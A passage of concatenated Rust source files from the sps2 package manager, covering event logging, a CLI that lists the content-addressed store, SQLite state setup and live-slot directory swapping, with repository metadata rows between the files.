"Dependency resolution failed"
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
conflicts = ?context.conflicting_packages,
"Dependency resolution failed"
);
}
}
}
}
}
// Install domain events
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Install {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
"Package installation started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
files_installed = ?context.files_installed,
"Package installation completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Package installation failed"
);
}
}
}
}
// Uninstall domain events
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Uninstall {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
"Package uninstallation started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
files_removed = ?context.files_removed,
"Package uninstallation completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
if failure_ctx.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Package uninstallation failed"
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Package uninstallation failed"
);
}
}
}
}
}
AppEvent::Qa(qa_event) => {
use sps2_events::{events::QaCheckStatus, QaEvent};
match qa_event {
QaEvent::PipelineStarted { target, level } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
level = ?level,
"QA pipeline started"
);
}
QaEvent::PipelineCompleted {
target,
total_checks,
passed,
failed,
duration_ms,
} => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
total_checks = total_checks,
passed = passed,
failed = failed,
duration_ms = duration_ms,
"QA pipeline completed"
);
}
QaEvent::PipelineFailed { target, failure } => {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
code = ?failure.code,
retryable = failure.retryable,
hint = ?failure.hint,
message = %failure.message,
"QA pipeline failed"
);
}
QaEvent::CheckEvaluated { summary, .. } => {
let status_str = format!("{:?}", summary.status);
let severity = match summary.status {
QaCheckStatus::Passed => tracing::Level::INFO,
QaCheckStatus::Failed => tracing::Level::ERROR,
QaCheckStatus::Skipped => tracing::Level::DEBUG,
};
match severity {
tracing::Level::ERROR => error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
check_name = %summary.name,
category = %summary.category,
status = %status_str,
findings = summary.findings.len(),
duration_ms = summary.duration_ms,
"QA check evaluated"
),
tracing::Level::DEBUG => debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
check_name = %summary.name,
category = %summary.category,
status = %status_str,
findings = summary.findings.len(),
duration_ms = summary.duration_ms,
"QA check evaluated"
),
_ => info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
check_name = %summary.name,
category = %summary.category,
status = %status_str,
findings = summary.findings.len(),
duration_ms = summary.duration_ms,
"QA check evaluated"
),
}
}
}
}
AppEvent::Package(package_event) => {
use sps2_events::PackageEvent;
match package_event {
PackageEvent::OperationStarted { operation } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = ?operation,
"Package operation started"
);
}
PackageEvent::OperationCompleted { operation, outcome } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = ?operation,
outcome = ?outcome,
"Package operation completed"
);
}
PackageEvent::OperationFailed { operation, failure } => {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = ?operation,
code = ?failure.code,
retryable = failure.retryable,
hint = ?failure.hint,
message = %failure.message,
"Package operation failed"
);
}
}
}
// State domain events
AppEvent::State(state_event) => {
use sps2_events::StateEvent;
match state_event {
StateEvent::TransitionStarted { context } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = %context.operation,
source_state = ?context.source,
target_state = %context.target,
"State transition started"
);
}
StateEvent::TransitionCompleted { context, summary } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = %context.operation,
source_state = ?context.source,
target_state = %context.target,
duration_ms = summary.as_ref().and_then(|s| s.duration_ms),
"State transition completed"
);
}
StateEvent::TransitionFailed { context, failure } => {
error!(
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | true |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sls/src/main.rs | apps/sls/src/main.rs | #![warn(mismatched_lifetime_syntaxes)]
//! sls - Store List utility for sps2
//!
//! A simple ls-like tool to explore the content-addressed store
use clap::Parser;
use sps2_config::fixed_paths;
use sps2_state::create_pool;
use sqlx::Acquire;
use std::collections::HashMap;
use std::io::IsTerminal;
use std::path::{Path, PathBuf};
use tokio::fs;
#[derive(Parser)]
#[command(name = "sls")]
#[command(about = "List store contents with real filenames", long_about = None)]
struct Cli {
/// Path or hash prefix to list
path: Option<String>,
/// Use a long listing format (shows permissions, size, etc)
#[arg(short, long)]
long: bool,
/// Show only hash without filename mapping
#[arg(long)]
hash: bool,
/// List subdirectories recursively
#[arg(short = 'R', long)]
recursive: bool,
/// Store path (defaults to /opt/pm/store)
#[arg(long)]
store: Option<PathBuf>,
/// Database path (defaults to /opt/pm/state.sqlite)
#[arg(long)]
db: Option<PathBuf>,
/// Show all entries (including . files)
#[arg(short, long)]
all: bool,
/// Disable colored output
#[arg(long)]
no_color: bool,
/// List packages instead of objects
#[arg(short = 'p', long = "packages")]
packages: bool,
}
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
// Exit cleanly when stdout is closed (e.g., piped to head)
#[cfg(unix)]
unsafe {
// Reset SIGPIPE to default so the process terminates without a panic
libc::signal(libc::SIGPIPE, libc::SIG_DFL);
}
let cli = Cli::parse();
let store_path = cli
.store
.unwrap_or_else(|| PathBuf::from(fixed_paths::STORE_DIR));
let db_path = cli
.db
.unwrap_or_else(|| PathBuf::from(fixed_paths::DB_PATH));
let use_color = !cli.no_color && std::io::stdout().is_terminal();
if cli.packages {
// List packages instead of objects
let package_map = load_package_mappings(&db_path).await?;
if let Some(path) = cli.path {
list_specific_package(&store_path, &path, &package_map, cli.long, use_color).await?;
} else {
list_packages(
&store_path,
&package_map,
cli.long,
cli.recursive,
use_color,
)
.await?;
}
} else {
// Open database to get file mappings
let file_map = load_file_mappings(&db_path).await?;
if let Some(path) = cli.path {
// User specified a path/hash
list_specific(
&store_path,
&path,
&file_map,
cli.long,
cli.hash,
cli.recursive,
use_color,
)
.await?;
} else {
// List all
list_store(
&store_path,
&file_map,
cli.long,
cli.hash,
cli.recursive,
use_color,
)
.await?;
}
}
Ok(())
}
async fn load_file_mappings(
db_path: &Path,
) -> Result<HashMap<String, Vec<String>>, Box<dyn std::error::Error>> {
let mut map = HashMap::new();
// Open database connection using state crate
let pool = create_pool(db_path).await?;
let mut conn = pool.acquire().await?;
let mut tx = conn.begin().await?;
// For now, we'll still use a raw query since we need ALL mappings
// In the future, we could add a batch function to the state crate
use sqlx::Row;
let rows = sqlx::query(
r#"
SELECT DISTINCT
pfe.file_hash,
pfe.relative_path,
p.name as package_name,
p.version as package_version
FROM package_file_entries pfe
JOIN packages p ON p.id = pfe.package_id
ORDER BY pfe.file_hash, pfe.relative_path
"#,
)
.fetch_all(&mut *tx)
.await?;
for row in rows {
let file_hash: String = row.get("file_hash");
let relative_path: String = row.get("relative_path");
let package_name: String = row.get("package_name");
let package_version: String = row.get("package_version");
let entry = format!("{relative_path} ({package_name}:{package_version})");
map.entry(file_hash).or_insert_with(Vec::new).push(entry);
}
tx.commit().await?;
Ok(map)
}
async fn list_store(
store_path: &Path,
file_map: &HashMap<String, Vec<String>>,
long_format: bool,
hash_only: bool,
recursive: bool,
use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
let objects_dir = store_path.join("objects");
if recursive {
list_recursive(&objects_dir, file_map, long_format, hash_only, use_color, 0).await?;
} else {
// List the first-level directories
let mut entries = fs::read_dir(&objects_dir).await?;
let mut dirs = Vec::new();
while let Some(entry) = entries.next_entry().await? {
if entry.file_type().await?.is_dir() {
dirs.push(entry.file_name().to_string_lossy().to_string());
}
}
dirs.sort();
for dir in dirs {
println!("{}/", style_blue(&dir, use_color));
}
}
Ok(())
}
async fn list_recursive(
dir: &Path,
file_map: &HashMap<String, Vec<String>>,
long_format: bool,
hash_only: bool,
use_color: bool,
depth: usize,
) -> Result<(), Box<dyn std::error::Error>> {
let indent = " ".repeat(depth);
let mut entries = fs::read_dir(dir).await?;
let mut items = Vec::new();
while let Some(entry) = entries.next_entry().await? {
items.push(entry);
}
// Sort entries
items.sort_by_key(|e| e.file_name());
for entry in items {
let metadata = entry.metadata().await?;
let name = entry.file_name().to_string_lossy().to_string();
if metadata.is_dir() {
println!("{indent}{}/", style_blue(&name, use_color));
// Recursive listing handled at top level
Box::pin(list_recursive(
&entry.path(),
file_map,
long_format,
hash_only,
use_color,
depth + 1,
))
.await?;
} else {
// It's a file - the filename is the hash
let full_hash = &name;
if hash_only {
println!("{indent}{full_hash}");
} else if long_format {
let size = format_size(metadata.len());
let perms = format_permissions(&metadata);
if let Some(names) = file_map.get(full_hash) {
for file_name in names {
println!(
"{}{} {:>8} {} -> {}",
indent,
perms,
size,
style_dimmed(short_hash(full_hash, 16), use_color),
style_green(file_name, use_color)
);
}
} else {
println!(
"{}{} {:>8} {} (unknown)",
indent,
perms,
size,
style_dimmed(short_hash(full_hash, 16), use_color)
);
}
} else {
// Default: short hash + filename
if let Some(names) = file_map.get(full_hash) {
for file_name in names {
println!(
"{}{} {}",
indent,
style_dimmed(short_hash(full_hash, 8), use_color),
style_green(file_name, use_color)
);
}
} else {
println!(
"{}{} (unknown)",
indent,
style_dimmed(short_hash(full_hash, 8), use_color)
);
}
}
}
}
Ok(())
}
async fn list_specific(
store_path: &Path,
path_or_hash: &str,
file_map: &HashMap<String, Vec<String>>,
long_format: bool,
hash_only: bool,
recursive: bool,
use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
// Check if it's a hex hash prefix with at least 2 chars
let is_hex = path_or_hash.chars().all(|c| c.is_ascii_hexdigit());
if path_or_hash.len() >= 2 && is_hex {
let prefix = path_or_hash.to_ascii_lowercase();
let prefix1 = &prefix[..2];
let objects = store_path.join("objects");
let p1_dir = objects.join(prefix1);
if !p1_dir.exists() {
eprintln!("No objects found with prefix '{path_or_hash}'");
return Ok(());
}
// Length-based behavior:
// - len == 2: list second-level dirs (00-ff)
// - len == 3: list second-level dirs starting with the 3rd nibble
// - len >= 4: list files in p1/p2 whose name starts with full prefix
match prefix.len() {
2 => {
let mut entries = fs::read_dir(&p1_dir).await?;
let mut dirs = Vec::new();
while let Some(e) = entries.next_entry().await? {
if e.file_type().await?.is_dir() {
dirs.push(e.file_name().to_string_lossy().to_string());
}
}
dirs.sort();
if recursive {
for d in dirs {
println!("{}/", style_blue(&d, use_color));
Box::pin(list_recursive(
&p1_dir.join(&d),
file_map,
long_format,
hash_only,
use_color,
1,
))
.await?;
}
} else {
for d in dirs {
println!("{}/", style_blue(&d, use_color));
}
}
}
3 => {
let p2_prefix = &prefix[2..3];
let mut entries = fs::read_dir(&p1_dir).await?;
let mut dirs = Vec::new();
while let Some(e) = entries.next_entry().await? {
if e.file_type().await?.is_dir() {
let name = e.file_name().to_string_lossy().to_string();
if name.starts_with(p2_prefix) {
dirs.push(name);
}
}
}
if dirs.is_empty() {
eprintln!("No objects found with prefix '{path_or_hash}'");
} else {
dirs.sort();
if recursive {
for d in dirs {
println!("{}/", style_blue(&d, use_color));
Box::pin(list_recursive(
&p1_dir.join(&d),
file_map,
long_format,
hash_only,
use_color,
1,
))
.await?;
}
} else {
for d in dirs {
println!("{}/", style_blue(&d, use_color));
}
}
}
}
_ => {
// len >= 4
let p2 = &prefix[2..4];
let dir = p1_dir.join(p2);
if !dir.exists() {
eprintln!("No objects found with prefix '{path_or_hash}'");
return Ok(());
}
let mut entries = fs::read_dir(&dir).await?;
let mut found = false;
while let Some(entry) = entries.next_entry().await? {
let name = entry.file_name().to_string_lossy().to_string();
// In the current layout, 'name' is the full hash
if !name.starts_with(&prefix) {
continue;
}
found = true;
let full_hash = name;
let metadata = entry.metadata().await?;
if hash_only {
println!("{full_hash}");
} else if long_format {
let size = format_size(metadata.len());
let perms = format_permissions(&metadata);
if let Some(names) = file_map.get(&full_hash) {
for file_name in names {
println!(
"{} {:>8} {} -> {}",
perms,
size,
style_dimmed(short_hash(&full_hash, 16), use_color),
style_green(file_name, use_color)
);
}
} else {
println!(
"{} {:>8} {} (unknown)",
perms,
size,
style_dimmed(short_hash(&full_hash, 16), use_color)
);
}
} else if let Some(names) = file_map.get(&full_hash) {
for file_name in names {
println!(
"{} {}",
style_dimmed(short_hash(&full_hash, 8), use_color),
style_green(file_name, use_color)
);
}
} else {
println!(
"{} (unknown)",
style_dimmed(short_hash(&full_hash, 8), use_color)
);
}
}
if !found {
eprintln!("No objects found with prefix '{path_or_hash}'");
}
}
}
} else {
eprintln!("Invalid hash prefix: {path_or_hash}");
}
Ok(())
}
fn short_hash(s: &str, n: usize) -> &str {
if s.len() <= n {
s
} else {
&s[..n]
}
}
fn format_permissions(metadata: &std::fs::Metadata) -> String {
#[cfg(unix)]
{
use std::os::unix::fs::PermissionsExt;
let mode = metadata.permissions().mode();
let file_type = if metadata.is_dir() { 'd' } else { '-' };
let user = format!(
"{}{}{}",
if mode & 0o400 != 0 { 'r' } else { '-' },
if mode & 0o200 != 0 { 'w' } else { '-' },
if mode & 0o100 != 0 { 'x' } else { '-' }
);
let group = format!(
"{}{}{}",
if mode & 0o040 != 0 { 'r' } else { '-' },
if mode & 0o020 != 0 { 'w' } else { '-' },
if mode & 0o010 != 0 { 'x' } else { '-' }
);
let other = format!(
"{}{}{}",
if mode & 0o004 != 0 { 'r' } else { '-' },
if mode & 0o002 != 0 { 'w' } else { '-' },
if mode & 0o001 != 0 { 'x' } else { '-' }
);
format!("{file_type}{user}{group}{other}")
}
#[cfg(not(unix))]
{
if metadata.permissions().readonly() {
"-r--r--r--".to_string()
} else {
"-rw-rw-rw-".to_string()
}
}
}
fn apply_ansi_style(text: &str, code: &str, use_color: bool) -> String {
if use_color {
format!("\x1b[{code}{text}\x1b[0m")
} else {
text.to_string()
}
}
fn style_dimmed(text: &str, use_color: bool) -> String {
apply_ansi_style(text, "2m", use_color)
}
fn style_blue(text: &str, use_color: bool) -> String {
apply_ansi_style(text, "34m", use_color)
}
fn style_green(text: &str, use_color: bool) -> String {
apply_ansi_style(text, "32m", use_color)
}
fn style_yellow(text: &str, use_color: bool) -> String {
apply_ansi_style(text, "33m", use_color)
}
fn style_cyan(text: &str, use_color: bool) -> String {
apply_ansi_style(text, "36m", use_color)
}
fn format_size(bytes: u64) -> String {
const UNITS: &[&str] = &["B", "KB", "MB", "GB", "TB"];
let mut size = bytes as f64;
let mut unit_index = 0;
while size >= 1024.0 && unit_index < UNITS.len() - 1 {
size /= 1024.0;
unit_index += 1;
}
if unit_index == 0 {
format!("{size:.0} {}", UNITS[unit_index])
} else {
format!("{size:.1} {}", UNITS[unit_index])
}
}
async fn load_package_mappings(
db_path: &Path,
) -> Result<HashMap<String, (String, String)>, Box<dyn std::error::Error>> {
let mut map = HashMap::new();
// Open database connection using state crate
let pool = create_pool(db_path).await?;
let mut conn = pool.acquire().await?;
let mut tx = conn.begin().await?;
// Query packages with their hashes
use sqlx::Row;
let rows = sqlx::query(
r#"
SELECT
hash,
name,
version
FROM packages
ORDER BY name, version
"#,
)
.fetch_all(&mut *tx)
.await?;
for row in rows {
let hash: String = row.get("hash");
let name: String = row.get("name");
let version: String = row.get("version");
map.insert(hash, (name, version));
}
tx.commit().await?;
Ok(map)
}
async fn list_packages(
store_path: &Path,
package_map: &HashMap<String, (String, String)>,
long_format: bool,
recursive: bool,
use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
let packages_dir = store_path.join("packages");
if !packages_dir.exists() {
eprintln!(
"Packages directory does not exist: {}",
packages_dir.display()
);
return Ok(());
}
let mut entries = fs::read_dir(&packages_dir).await?;
let mut packages = Vec::new();
while let Some(entry) = entries.next_entry().await? {
if entry.file_type().await?.is_dir() {
packages.push(entry);
}
}
// Sort by name
packages.sort_by_key(|e| e.file_name());
for entry in packages {
let hash = entry.file_name().to_string_lossy().to_string();
if long_format {
let metadata = entry.metadata().await?;
let perms = format_permissions(&metadata);
if let Some((name, version)) = package_map.get(&hash) {
println!(
"{} {} ({}:{})",
perms,
style_dimmed(&hash, use_color),
style_cyan(name, use_color),
style_yellow(version, use_color)
);
} else {
println!(
"{} {} (unknown package)",
perms,
style_dimmed(&hash, use_color)
);
}
if recursive {
// List contents of package directory
let mut pkg_entries = fs::read_dir(entry.path()).await?;
let mut files = Vec::new();
while let Some(pkg_entry) = pkg_entries.next_entry().await? {
files.push(pkg_entry.file_name().to_string_lossy().to_string());
}
files.sort();
for file in files {
println!(" {}", style_green(&file, use_color));
}
}
} else {
// Short format
if let Some((name, version)) = package_map.get(&hash) {
println!(
"{} -> {}:{}",
style_dimmed(short_hash(&hash, 16), use_color),
style_cyan(name, use_color),
style_yellow(version, use_color)
);
} else {
println!(
"{} (unknown)",
style_dimmed(short_hash(&hash, 16), use_color)
);
}
}
}
Ok(())
}
async fn list_specific_package(
store_path: &Path,
hash_prefix: &str,
package_map: &HashMap<String, (String, String)>,
long_format: bool,
use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
let packages_dir = store_path.join("packages");
if !packages_dir.exists() {
eprintln!(
"Packages directory does not exist: {}",
packages_dir.display()
);
return Ok(());
}
let mut entries = fs::read_dir(&packages_dir).await?;
let mut found = false;
while let Some(entry) = entries.next_entry().await? {
if entry.file_type().await?.is_dir() {
let hash = entry.file_name().to_string_lossy().to_string();
if hash.starts_with(hash_prefix) {
found = true;
if long_format {
let metadata = entry.metadata().await?;
let perms = format_permissions(&metadata);
if let Some((name, version)) = package_map.get(&hash) {
println!(
"{} {} ({}:{})",
perms,
style_dimmed(&hash, use_color),
style_cyan(name, use_color),
style_yellow(version, use_color)
);
} else {
println!(
"{} {} (unknown package)",
perms,
style_dimmed(&hash, use_color)
);
}
// List contents of package directory
let mut pkg_entries = fs::read_dir(entry.path()).await?;
let mut files = Vec::new();
while let Some(pkg_entry) = pkg_entries.next_entry().await? {
files.push(pkg_entry.file_name().to_string_lossy().to_string());
}
files.sort();
for file in files {
println!(" {}", style_green(&file, use_color));
}
} else {
// Short format
if let Some((name, version)) = package_map.get(&hash) {
println!(
"{} -> {}:{}",
style_dimmed(&hash, use_color),
style_cyan(name, use_color),
style_yellow(version, use_color)
);
} else {
println!("{} (unknown)", style_dimmed(&hash, use_color));
}
}
}
}
}
if !found {
eprintln!("No packages found with prefix '{hash_prefix}'");
}
Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/build.rs | crates/state/build.rs | use std::env;
use std::path::PathBuf;
fn main() {
// Set SQLX_OFFLINE_DIR if not already set
if env::var("SQLX_OFFLINE_DIR").is_err() {
// Check multiple possible locations
let possible_dirs = vec![
PathBuf::from("/opt/pm/.sqlx"),
PathBuf::from(".sqlx"),
env::current_dir().unwrap().join(".sqlx"),
];
for dir in possible_dirs {
if dir.exists() {
println!("cargo:rustc-env=SQLX_OFFLINE_DIR={}", dir.display());
break;
}
}
}
// Force offline mode in production builds
if env::var("SQLX_OFFLINE").is_err() {
println!("cargo:rustc-env=SQLX_OFFLINE=true");
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/lib.rs | crates/state/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
#![allow(
clippy::needless_raw_string_hashes,
clippy::cast_possible_truncation,
clippy::cast_sign_loss,
clippy::cast_possible_wrap,
clippy::cast_lossless,
clippy::map_unwrap_or,
clippy::unused_async,
clippy::missing_panics_doc
)]
#![allow(clippy::module_name_repetitions)]
//! State management for sps2
//!
//! This crate manages the `SQLite` database that tracks system state,
//! installed packages, and enables atomic updates with rollback.
pub mod db;
pub mod file_models;
pub mod file_queries_runtime;
pub mod live_slots;
pub mod manager;
pub mod models;
#[cfg(feature = "runtime-queries")]
pub use manager::{StateManager, TransactionData};
pub mod queries {
pub use crate::file_queries_runtime::*;
pub use crate::queries_runtime::*;
}
#[cfg(feature = "runtime-queries")]
mod queries_runtime;
pub use file_models::{
DeduplicationResult, FileMTimeTracker, FileMetadata, FileObject, FileReference,
FileStorageStats, InstalledFile, PackageFileEntry,
};
pub use models::{Package, PackageRef, State, StoreRef};
use sps2_errors::Error;
use sqlx::sqlite::{SqliteConnectOptions, SqliteJournalMode, SqlitePoolOptions};
use sqlx::{Pool, Sqlite};
use std::path::Path;
use std::time::Duration;
/// Create a new `SQLite` connection pool
///
/// # Errors
///
/// Returns an error if the database connection fails or configuration is invalid.
pub async fn create_pool(db_path: &Path) -> Result<Pool<Sqlite>, Error> {
let options = SqliteConnectOptions::new()
.filename(db_path)
.create_if_missing(true)
.journal_mode(SqliteJournalMode::Wal)
.busy_timeout(Duration::from_secs(30));
let pool = SqlitePoolOptions::new()
.max_connections(5)
.connect_with(options)
.await
.map_err(|e| {
Error::from(sps2_errors::StateError::DatabaseError {
message: e.to_string(),
})
})?;
if let Ok(mut conn) = pool.acquire().await {
let _ = sqlx::query("PRAGMA synchronous = NORMAL")
.execute(&mut *conn)
.await;
let _ = sqlx::query("PRAGMA temp_store = MEMORY")
.execute(&mut *conn)
.await;
let _ = sqlx::query("PRAGMA mmap_size = 268435456")
.execute(&mut *conn)
.await;
let _ = sqlx::query("PRAGMA cache_size = -20000")
.execute(&mut *conn)
.await;
let _ = sqlx::query("PRAGMA wal_autocheckpoint = 1000")
.execute(&mut *conn)
.await;
}
Ok(pool)
}
/// Run database migrations
///
/// # Errors
///
/// Returns an error if any migration fails to execute.
pub async fn run_migrations(pool: &Pool<Sqlite>) -> Result<(), Error> {
sqlx::migrate!("./migrations").run(pool).await.map_err(|e| {
sps2_errors::StateError::MigrationFailed {
message: e.to_string(),
}
.into()
})
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/live_slots.rs | crates/state/src/live_slots.rs | //! Slot management for the live prefix.
//!
//! Slots provide two alternating directories that back the `/opt/pm/live`
//! filesystem tree. Every operation stages into the inactive slot, commits do a
//! pair of atomic renames so `/opt/pm/live` always remains a real directory, and
//! the inactive slot retains the previous state for rollback.
use serde::{Deserialize, Serialize};
use sps2_errors::Error;
use sps2_platform::filesystem_helpers as fs;
use sps2_types::state::SlotId;
use std::io::ErrorKind;
use std::path::{Path, PathBuf};
use tokio::fs as tokio_fs;
use uuid::Uuid;
const SLOT_STATE_FILENAME: &str = "STATE";
#[derive(Debug, Clone, Serialize, Deserialize)]
struct SlotMetadata {
active: SlotId,
#[serde(default)]
live_a: Option<Uuid>,
#[serde(default)]
live_b: Option<Uuid>,
}
impl Default for SlotMetadata {
fn default() -> Self {
Self {
active: SlotId::A,
live_a: None,
live_b: None,
}
}
}
impl SlotMetadata {
fn state(&self, slot: SlotId) -> Option<Uuid> {
match slot {
SlotId::A => self.live_a,
SlotId::B => self.live_b,
}
}
fn set_state(&mut self, slot: SlotId, value: Option<Uuid>) {
match slot {
SlotId::A => self.live_a = value,
SlotId::B => self.live_b = value,
}
}
}
/// Manages alternating live slots.
pub struct LiveSlots {
live_path: PathBuf,
slots_dir: PathBuf,
metadata_path: PathBuf,
metadata: SlotMetadata,
}
impl LiveSlots {
/// Initialize slot tracking.
///
/// # Errors
///
/// Returns an error if filesystem operations fail or metadata loading fails.
pub async fn initialize(state_dir: PathBuf, live_path: PathBuf) -> Result<Self, Error> {
let slots_dir = state_dir.join("slots");
fs::create_dir_all(&slots_dir).await?;
for slot in SlotId::ALL {
fs::create_dir_all(&slots_dir.join(slot.dir_name())).await?;
}
if !fs::exists(&live_path).await {
fs::create_dir_all(&live_path).await?;
}
let metadata_path = state_dir.join("live_slots.json");
let metadata = Self::load_metadata(&metadata_path).await?;
let slots = Self {
live_path,
slots_dir,
metadata_path,
metadata,
};
slots.persist_metadata().await?;
Ok(slots)
}
/// Returns the currently active slot.
#[must_use]
pub fn active_slot(&self) -> SlotId {
self.metadata.active
}
/// Returns the inactive slot (target for staging).
#[must_use]
pub fn inactive_slot(&self) -> SlotId {
self.metadata.active.other()
}
/// Filesystem path for a slot directory.
#[must_use]
pub fn slot_path(&self, slot: SlotId) -> PathBuf {
self.slots_dir.join(slot.dir_name())
}
/// Lookup the recorded state for a slot.
#[must_use]
pub fn slot_state(&self, slot: SlotId) -> Option<Uuid> {
self.metadata.state(slot)
}
/// Ensure a slot directory exists and return its path.
///
/// # Errors
///
/// Returns an error if creating the directory fails.
pub async fn ensure_slot_dir(&mut self, slot: SlotId) -> Result<PathBuf, Error> {
let path = self.slot_path(slot);
fs::create_dir_all(&path).await?;
Ok(path)
}
/// Record (or clear) the state marker for a slot and persist metadata.
///
/// # Errors
///
/// Returns an error if writing the marker or persisting metadata fails.
pub async fn record_slot_state(
&mut self,
slot: SlotId,
state: Option<Uuid>,
) -> Result<(), Error> {
self.write_slot_marker(slot, state).await?;
self.metadata.set_state(slot, state);
self.persist_metadata().await
}
/// Update metadata without touching markers.
///
/// # Errors
///
/// Returns an error if persisting metadata fails.
pub async fn set_slot_state(&mut self, slot: SlotId, state: Option<Uuid>) -> Result<(), Error> {
self.metadata.set_state(slot, state);
self.persist_metadata().await
}
/// Refresh state markers from disk.
///
/// # Errors
///
/// Returns an error if reading markers or persisting metadata fails.
pub async fn refresh_slot_states(&mut self) -> Result<(), Error> {
for slot in SlotId::ALL {
let marker_path = self.slot_path(slot).join(SLOT_STATE_FILENAME);
let state = match tokio_fs::read_to_string(&marker_path).await {
Ok(content) => parse_state_marker(&content)?,
Err(err) if err.kind() == ErrorKind::NotFound => None,
Err(err) => {
return Err(Error::internal(format!(
"failed to read slot marker {}: {err}",
marker_path.display()
)))
}
};
self.metadata.set_state(slot, state);
}
self.persist_metadata().await
}
/// Swap the prepared slot into `/opt/pm/live`, preserving the previous live
/// directory under the previously active slot path.
///
/// # Errors
///
/// Returns an error if filesystem operations fail.
pub async fn swap_to_live(
&mut self,
staging_slot: SlotId,
new_state: Uuid,
parent_state: Uuid,
) -> Result<(), Error> {
let current_active = self.metadata.active;
let live_path = self.live_path.clone();
let staging_path = self.slot_path(staging_slot);
let backup_path = self.slot_path(current_active);
if fs::exists(&backup_path).await {
fs::remove_dir_all(&backup_path).await?;
}
if fs::exists(&live_path).await {
fs::atomic_rename(&live_path, &backup_path).await?;
}
if let Some(parent) = live_path.parent() {
fs::create_dir_all(parent).await?;
}
fs::atomic_rename(&staging_path, &live_path).await?;
// Recreate an empty directory for the slot we just promoted so future
// operations can stage into it once it becomes inactive again.
fs::create_dir_all(&staging_path).await?;
self.write_slot_marker(staging_slot, Some(new_state))
.await?;
self.metadata.active = staging_slot;
self.metadata.set_state(staging_slot, Some(new_state));
self.metadata.set_state(current_active, Some(parent_state));
self.persist_metadata().await
}
async fn write_slot_marker(&self, slot: SlotId, state: Option<Uuid>) -> Result<(), Error> {
let marker_path = self.slot_path(slot).join(SLOT_STATE_FILENAME);
match state {
Some(id) => tokio_fs::write(&marker_path, id.to_string())
.await
.map_err(|e| Error::internal(format!("failed to write slot marker: {e}")))?,
None => {
if fs::exists(&marker_path).await {
fs::remove_file(&marker_path).await?;
}
}
}
Ok(())
}
async fn persist_metadata(&self) -> Result<(), Error> {
let payload = serde_json::to_vec_pretty(&self.metadata)
